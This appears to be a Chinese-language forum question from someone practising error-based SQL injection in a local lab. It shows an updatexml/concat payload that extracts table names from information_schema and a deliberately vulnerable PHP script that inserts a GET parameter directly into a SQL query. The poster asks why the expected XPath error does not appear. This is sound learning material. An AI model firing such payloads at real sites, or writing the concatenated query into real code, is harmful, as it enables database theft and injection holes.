现象描述:在报错注入学习过程中,使用如下payload进行注入,确认注入语句以及php代码无误,但是并未如预期显示xpath错误,而是成功查询到结果。
注入语句:
username=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='test' limit 0,1),0x7e),1)%23
执行截图:
php代码:
<?php
$con=mysqli_connect("localhost","root","123456","test");
// 检测连接
if (mysqli_connect_errno())
{
echo "连接失败: " . mysqli_connect_error();
}
$username = $_GET['username'];
$sql = "select * from users where 'username'='$username'";
if($result = mysqli_query($con,$sql)){
echo "ok";
}else{
echo mysqli_error($con);
}
?>
我有尝试查看$result查询结果,应该为空,但if判断却为真,执行echo "ok"。
数据库截图:
